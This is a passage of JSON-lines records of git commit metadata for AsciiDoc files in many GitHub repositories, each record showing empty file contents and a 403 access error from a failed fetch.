{"commit":"bee124d11ec4e016db87d7730ac895458b8aa87d","subject":"Update 2018-09-24-Time-for-Class.adoc","message":"Update 2018-09-24-Time-for-Class.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-24-Time-for-Class.adoc","new_file":"_posts\/2018-09-24-Time-for-Class.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2f4e2fe6a4de11889c7a92e870733c10204ab2d6","subject":"Update 2018-09-24-Time-for-Class.adoc","message":"Update 2018-09-24-Time-for-Class.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-24-Time-for-Class.adoc","new_file":"_posts\/2018-09-24-Time-for-Class.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"947d8f3b84acc8f1f7f49b2dfc92e86a495658c1","subject":"Wording","message":"Wording\n","repos":"oliviercailloux\/jee,oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Best practices\/Style.adoc","new_file":"Best practices\/Style.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"be366b749529f434fc0b29756fdda8b6e0b96d6d","subject":"update formatting of command line and link at end of sentence","message":"update formatting of command line and link at end of sentence\n","repos":"docToolchain\/docToolchain,carloslozano\/docToolchain,carloslozano\/docToolchain,docToolchain\/docToolchain,jakubjab\/docToolchain,docToolchain\/docToolchain,docToolchain\/docToolchain,carloslozano\/docToolchain","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/docToolchain\/docToolchain.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1a1c903b12078963eecdcf63db28cc2b1eb344e6","subject":"Asciidoc readme","message":"Asciidoc readme\n","repos":"koert\/gpio,koert\/gpio,koert\/gpio","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/koert\/gpio.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"56296607720e8df821719c2678ebee75a531f2ab","subject":"build.gradle\u4fee\u6b636","message":"build.gradle\u4fee\u6b636\n","repos":"TraningManagementSystem\/tms,TraningManagementSystem\/tms,TraningManagementSystem\/tms,TraningManagementSystem\/tms","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TraningManagementSystem\/tms.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"aa050640fd80edea8399b17482f6b2482242d527","subject":"Updated README","message":"Updated README\n","repos":"jxxcarlson\/AsciidocEdit,jxxcarlson\/AsciidocEdit","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jxxcarlson\/AsciidocEdit.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ae0175d16f9b584e07f90a7b44916cb12e6fc773","subject":"updated README","message":"updated README\n","repos":"uoa-group-applications\/hooks-jira","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/uoa-group-applications\/hooks-jira.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f02b62a328c94f1ae4eeb21011b3059be279eaa3","subject":"y2b create post The Loudest Wireless Speaker!","message":"y2b create post The Loudest Wireless Speaker!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-10-06-The-Loudest-Wireless-Speaker.adoc","new_file":"_posts\/2015-10-06-The-Loudest-Wireless-Speaker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dd3abd54ea62e40478f9d86e5c80287473e7ff00","subject":"Update 2017-10-18-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","message":"Update 2017-10-18-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-10-18-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","new_file":"_posts\/2017-10-18-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"40bff8afacd51002b33aa8a2ba463d43ad6397a8","subject":"Update 2015-05-03-Mein-erster-Blogeintrag-mit-Hubpressio.adoc","message":"Update 2015-05-03-Mein-erster-Blogeintrag-mit-Hubpressio.adoc","repos":"fundstuecke\/fundstuecke.github.io,fundstuecke\/fundstuecke.github.io,fundstuecke\/fundstuecke.github.io","old_file":"_posts\/2015-05-03-Mein-erster-Blogeintrag-mit-Hubpressio.adoc","new_file":"_posts\/2015-05-03-Mein-erster-Blogeintrag-mit-Hubpressio.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fundstuecke\/fundstuecke.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0fe4c6192ce3cd79eaf7263ce5c5007e9a1d7fe3","subject":"y2b create post Unboxing Google Home Mini With Demar DeRozan!","message":"y2b create post Unboxing Google Home Mini With Demar DeRozan!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-12-19-UnboxingGoogleHomeMiniWithDemarDeRozan.adoc","new_file":"_posts\/2017-12-19-UnboxingGoogleHomeMiniWithDemarDeRozan.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e0e6d5a3074aed1f45be402840f9aa93695649ae","subject":"[docs] Add lpeers output to ntp monitoring","message":"[docs] Add lpeers output to ntp monitoring\n\nThe ntp monitoring had an example of opeers output and had a tip\nexplaining some versions have lpeers and some others opeers. These two\nare in fact two separate, although similar commands, and as far as I\nknow both of them are available in all modern versions.\n\nAdded an lpeers output, but had to change the lpeers output as well to\nkeep things consistent. I also changed the tip to reflect this.\n\nChange-Id: I5009a330cfd3e81496e95b3e3cf1fb2b7627b085\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/10041\nTested-by: Kudu Jenkins\nReviewed-by: Todd Lipcon <2c763d726a8c2f6afda9be7e0e56a2caa6bb5e6b@apache.org>\n","repos":"cloudera\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,cloudera\/kudu,cloudera\/kudu,InspurUSA\/kudu,cloudera\/kudu,InspurUSA\/kudu,cloudera\/kudu,andrwng\/kudu,andrwng\/kudu,cloudera\/kudu,helifu\/kudu,helifu\/kudu,cloudera\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,cloudera\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,andrwng\/kudu,helifu\/kudu,andrwng\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,andrwng\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,helifu\/kudu","old_file":"docs\/troubleshooting.adoc","new_file":"docs\/troubleshooting.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"000791109f64be139bb04e325c83b3ed7ea21d1b","subject":"docs: update installation with new OS support","message":"docs: update installation with new OS support\n\nAt the time of writing, a couple things are broken:\n1. The SLES 12, Jessie, and Xenial Cloudera repo files contain unsubstituted\n template variables.\n2. The SLES 12 Cloudera kudu package has a dependency (cyrus-sasl-lib) that\n does not exist on SLES 12.\n\nI'm testing a patch to fix #2 and we're trying to fix #1 live. I did verify\nthat the SLES 12 packages work if installation is forced.\n\nChange-Id: I2f51b55561f18fbe28d6bf4ed507dfba65947dc0\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/4128\nTested-by: Kudu Jenkins\nReviewed-by: Alexey Serbin <864f6b82bd94e8dda64141d4274519ee66e0102e@cloudera.com>\nReviewed-by: Todd Lipcon <2c763d726a8c2f6afda9be7e0e56a2caa6bb5e6b@apache.org>\n","repos":"cloudera\/kudu,helifu\/kudu,andrwng\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,andrwng\/kudu,andrwng\/kudu,andrwng\/kudu,andrwng\/kudu,cloudera\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,cloudera\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,helifu\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,cloudera\/kudu,cloudera\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,helifu\/kudu","old_file":"docs\/installation.adoc","new_file":"docs\/installation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"266334d1db8dc501240751f6e59ba44d0b6b82db","subject":"correct paths in 'Adding Service Support' section","message":"correct paths in 'Adding Service Support' section\n","repos":"scottfrederick\/spring-cloud-connectors,spring-cloud\/spring-cloud-connectors,chrisjs\/spring-cloud-connectors,scottfrederick\/spring-cloud-connectors,spring-cloud\/spring-cloud-connectors,chrisjs\/spring-cloud-connectors","old_file":"docs\/src\/main\/asciidoc\/spring-cloud-connectors.adoc","new_file":"docs\/src\/main\/asciidoc\/spring-cloud-connectors.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottfrederick\/spring-cloud-connectors.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d07e449343c7ef0efb667fd20aa7822461fcf964","subject":"Create README","message":"Create README","repos":"AlexCzar\/recursive-generics-experiment","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/AlexCzar\/recursive-generics-experiment.git\/': The requested URL returned error: 403\n","license":"unlicense","lang":"AsciiDoc"} {"commit":"ad39c9086adfba67adfcceec9b0f4e57b02b14b4","subject":"Every project needs a readme :)","message":"Every project needs a readme :)\n","repos":"robotarmorg\/DrawBot","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/robotarmorg\/DrawBot.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c0d2bfc5074db1c588f036c692316bb820510392","subject":"Update 2015-05-30-My-Asyncjs-Cheatsheet.adoc","message":"Update 2015-05-30-My-Asyncjs-Cheatsheet.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2015-05-30-My-Asyncjs-Cheatsheet.adoc","new_file":"_posts\/2015-05-30-My-Asyncjs-Cheatsheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9307143f0b17468c82e5b83aec96477eb187e029","subject":"Update 2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","message":"Update 2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","new_file":"_posts\/2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b36bd1e79bccc00b31ad97954b54dd6e9a652ecf","subject":"docs added","message":"docs added\n","repos":"SergeyPirogov\/kirk,SergeyPirogov\/kirk,SergeyPirogov\/kirk","old_file":"docs\/source\/index.adoc","new_file":"docs\/source\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/SergeyPirogov\/kirk.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7a3244dcb70efb82820cec5a20aba1716a91fa6e","subject":"Update 2017-05-19-swift-chat.adoc","message":"Update 2017-05-19-swift-chat.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-05-19-swift-chat.adoc","new_file":"_posts\/2017-05-19-swift-chat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"63cfdadda93077dfd429ce6b2a4eada0a95f57e0","subject":"Update 2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","message":"Update 2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","new_file":"_posts\/2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"98b85c0be6af924862dfb66bc7b31b0e1637f1dc","subject":"There is a small inaccuracy in the description","message":"There is a small inaccuracy in the description\n\nFix it.\n","repos":"dulanov\/emerald-rs","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dulanov\/emerald-rs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ab8a14004b102f7f1556d0de2717a052475e5280","subject":"Update 2017-06-03-Build-your-own-Vuejs-20-Website-with-ElementUI.adoc","message":"Update 2017-06-03-Build-your-own-Vuejs-20-Website-with-ElementUI.adoc","repos":"tjfy1992\/tjfy1992.github.io,tjfy1992\/tjfy1992.github.io,tjfy1992\/tjfy1992.github.io,tjfy1992\/tjfy1992.github.io","old_file":"_posts\/2017-06-03-Build-your-own-Vuejs-20-Website-with-ElementUI.adoc","new_file":"_posts\/2017-06-03-Build-your-own-Vuejs-20-Website-with-ElementUI.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tjfy1992\/tjfy1992.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4f951b39630dad785737f4cdfb68fa0bf6271dc7","subject":"added an overall abstact, made some other minor edits","message":"added an overall abstact, made some other minor edits\n","repos":"couchbaselabs\/Workshop,couchbaselabs\/Workshop,couchbaselabs\/Workshop","old_file":"connect2016\/developer\/README.adoc","new_file":"connect2016\/developer\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/couchbaselabs\/Workshop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8168f2197dd277779f2739a727c405266b61bd47","subject":"y2b create post The MacBook Air Affair (Unboxing)","message":"y2b create post The MacBook Air Affair (Unboxing)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-08-06-The-MacBook-Air-Affair-Unboxing.adoc","new_file":"_posts\/2011-08-06-The-MacBook-Air-Affair-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2f9601c0bf8af203994b80430bb30cc94ed58a5a","subject":"Added project readme.","message":"Added project readme.\n","repos":"jeffrimko\/QuickWin,jeffrimko\/QuickWin","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jeffrimko\/QuickWin.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c77750c50b55b77f525a1b243a09e4819a08bd6f","subject":"fixed paragraph about Kubernetess wrongly mentioned Cloud Foundry (#152)","message":"fixed paragraph about Kubernetess wrongly mentioned Cloud Foundry (#152)\n\n","repos":"k0chan\/spring-cloud-pipelines,wybczu\/spring-cloud-pipelines,wybczu\/spring-cloud-pipelines,k0chan\/spring-cloud-pipelines,wybczu\/spring-cloud-pipelines,spring-cloud\/spring-cloud-pipelines,spring-cloud\/spring-cloud-pipelines,spring-cloud\/spring-cloud-pipelines,spring-cloud\/spring-cloud-pipelines,k0chan\/spring-cloud-pipelines,wybczu\/spring-cloud-pipelines,k0chan\/spring-cloud-pipelines","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wybczu\/spring-cloud-pipelines.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b6488ebc56e2f05949d89e07424deb577fe9659e","subject":"Adding readme file","message":"Adding readme file\n","repos":"craigatk\/grain-theme-bootstrap,craigatk\/grain-theme-bootstrap,craigatk\/grain-theme-bootstrap,craigatk\/grain-theme-bootstrap,craigatk\/grain-theme-bootstrap","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/craigatk\/grain-theme-bootstrap.git\/': The requested URL returned error: 403\n","license":"unlicense","lang":"AsciiDoc"} {"commit":"419147beecc8bd9e62aa370422ef8808f67d42f1","subject":"Update README","message":"Update README\n","repos":"pjanouch\/acid","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pjanouch\/acid.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"127d818ff5760f5a9d5060542d0ad127daa8fe16","subject":"Create README.adoc","message":"Create README.adoc","repos":"ajneu\/x_macros","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ajneu\/x_macros.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aa5f99d4dd1fc694ce0759ec8e17199f49b8ba85","subject":"Create README.adoc","message":"Create README.adoc","repos":"nmcl\/golang","old_file":"example\/src\/hello\/README.adoc","new_file":"example\/src\/hello\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nmcl\/golang.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"299125f66d0dd028e4d4d110bc52dedd50158b3b","subject":"Updates book-using-jison-beyond-the-basics\/Introduction.adoc","message":"Updates book-using-jison-beyond-the-basics\/Introduction.adoc\n\nAuto commit by GitBook Editor","repos":"GerHobbelt\/jison,GerHobbelt\/jison,GerHobbelt\/jison,GerHobbelt\/jison","old_file":"book-using-jison-beyond-the-basics\/Introduction.adoc","new_file":"book-using-jison-beyond-the-basics\/Introduction.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/GerHobbelt\/jison.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"41c7cbb3488a2dc07e9f56387a36f846459d7e2c","subject":"Update 2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","message":"Update 2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","new_file":"_posts\/2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"da792b079c08a906a7b941353058632138bc818d","subject":"Update 2016-04-01-A-quien-le-interese-Semana-1.adoc","message":"Update 2016-04-01-A-quien-le-interese-Semana-1.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-01-A-quien-le-interese-Semana-1.adoc","new_file":"_posts\/2016-04-01-A-quien-le-interese-Semana-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"25c751041a26f083797f347affdedfb667dca58c","subject":"y2b create post Does It Suck? - $37 Android Tablet","message":"y2b create post Does It Suck? - $37 Android Tablet","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-08-14-Does-It-Suck--37-Android-Tablet.adoc","new_file":"_posts\/2015-08-14-Does-It-Suck--37-Android-Tablet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f7693f7b4d71c22f951430f818b37d4e0b939a09","subject":"y2b create post This Tiny Printer Uses Zero Ink","message":"y2b create post This Tiny Printer Uses Zero Ink","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-10-13-This-Tiny-Printer-Uses-Zero-Ink.adoc","new_file":"_posts\/2016-10-13-This-Tiny-Printer-Uses-Zero-Ink.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"abf07b2fc91d4f3fd4af59f1e6edbaac5e14c8c6","subject":"Update 2017-06-20-Why-I-Have-No-Free-Time-Anymore.adoc","message":"Update 2017-06-20-Why-I-Have-No-Free-Time-Anymore.adoc","repos":"gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io","old_file":"_posts\/2017-06-20-Why-I-Have-No-Free-Time-Anymore.adoc","new_file":"_posts\/2017-06-20-Why-I-Have-No-Free-Time-Anymore.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gjagush\/gjagush.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cd1255ec8eca5a6a4533e5bbc8f1a5bacb5371ac","subject":"Expansion pair toString","message":"Expansion pair toString\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Objects & interfaces\/README.adoc","new_file":"Objects & interfaces\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f594080c4c2caee9e3d4c1f93097086a48a69df0","subject":"Update 2016-11-14-231000-Monday.adoc","message":"Update 2016-11-14-231000-Monday.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-14-231000-Monday.adoc","new_file":"_posts\/2016-11-14-231000-Monday.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"df5293271556d4db887374cd9df6278aa0c6ee86","subject":"..\/_posts\/2016-08-25-Dorset.adoc","message":"..\/_posts\/2016-08-25-Dorset.adoc\n","repos":"evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io","old_file":"_posts\/2016-08-25-Dorset.adoc","new_file":"_posts\/2016-08-25-Dorset.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/evolgenomology\/evolgenomology.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"960d9cc7b3cda1e78b8f8bd76b86856e841c35be","subject":"Update 2016-04-05-Bienvenue.adoc","message":"Update 2016-04-05-Bienvenue.adoc","repos":"philippevidal80\/blog,philippevidal80\/blog,philippevidal80\/blog,philippevidal80\/blog","old_file":"_posts\/2016-04-05-Bienvenue.adoc","new_file":"_posts\/2016-04-05-Bienvenue.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/philippevidal80\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aa8183c92f0ba02962a650828c2bd93796d3ff3c","subject":"Update 2018-05-14-Spacemacs.adoc","message":"Update 2018-05-14-Spacemacs.adoc","repos":"remi-hernandez\/remi-hernandez.github.io,remi-hernandez\/remi-hernandez.github.io","old_file":"_posts\/2018-05-14-Spacemacs.adoc","new_file":"_posts\/2018-05-14-Spacemacs.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/remi-hernandez\/remi-hernandez.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c9e030cba45e5d9223ee1ee1388e177f3b0c3134","subject":"Add documentation of a simple client side integration for gathering the data required to execute checkout integration tests","message":"Add documentation of a simple client side integration for gathering the data required to execute checkout integration tests\n","repos":"BroadleafCommerce\/blc-paypal","old_file":"docs\/src\/main\/asciidoc\/SimplePayPalButtonIntegration.adoc","new_file":"docs\/src\/main\/asciidoc\/SimplePayPalButtonIntegration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/BroadleafCommerce\/blc-paypal.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d46cadc89c0c22fe972aa299ccfe49ff234b3428","subject":"y2b create post Saints Row The Third Platinum Pack Unboxing","message":"y2b create post Saints Row The Third Platinum Pack Unboxing","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-11-15-Saints-Row-The-Third-Platinum-Pack-Unboxing.adoc","new_file":"_posts\/2011-11-15-Saints-Row-The-Third-Platinum-Pack-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c445e591756dd798470a62beb75e8feba7f4d0d0","subject":"Add FIP64 operations guide","message":"Add FIP64 operations guide\n\nThis includes FIP64 